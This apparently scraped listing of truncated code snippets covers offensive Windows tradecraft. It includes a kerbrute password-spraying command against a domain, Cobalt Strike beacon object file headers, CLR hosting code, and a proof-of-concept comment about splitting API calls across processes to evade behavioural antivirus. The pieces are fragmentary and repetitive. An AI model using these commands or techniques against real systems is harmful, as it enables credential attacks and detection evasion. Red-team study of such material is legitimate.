With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#include <windows.h> | |
#include <stdio.h> | |
#include <dsgetdc.h> | |
#include <psapi.h> | |
extern "C" { | |
#include "beacon.h" | |
}; | |
// Compile as C++ (/TP) for decltype |
# On Windows, within a VS developer prompt | |
# Dump the exports of msvcrt.dll | |
dumpbin.exe /exports C:\Windows\System32\msvcrt.dll > msvcrt.txt | |
# Copy msvcrt.txt to a Linux box | |
# Convert the file to Unix line endings | |
dos2unix msvcrt.txt |
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
/* | |
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes. | |
*/ | |
#include <stdio.h> | |
#include <tchar.h> | |
#include <windows.h> | |
#include "Commctrl.h" | |
#include <string> |
#define APSTUDIO_READONLY_SYMBOLS | |
#include "winres.h" | |
VS_VERSION_INFO VERSIONINFO | |
FILEVERSION 1,3,3,4 | |
PRODUCTVERSION 1,3,3,1 | |
FILEFLAGSMASK 0x3fL | |
#ifdef _DEBUG | |
FILEFLAGS 0x1L | |
#else |
@echo off | |
:: This batch script should be run from a VS developer prompt. | |
:: rc will create a binary .res file | |
rc Resource.rc | |
:: cvtres will convert the .res file to a COFF object file | |
cvtres /MACHINE:x64 /OUT:Resource.o Resource.res |
#!/bin/bash | |
# This script needs mingw installed | |
# Convert a .rc resource script input file to a .res binary resource output file | |
x86_64-w64-mingw32-windres -J rc -i Resource.rc -O res -o Resource.res | |
# Convert a .res binary resource input file to a COFF object output file | |
x86_64-w64-mingw32-windres -J res -i Resource.res -O coff -o Resource.o |
/* | |
================================ Compile as a .Net DLL ============================== | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
*/ | |
using System.Windows.Forms; | |
namespace TestNamespace |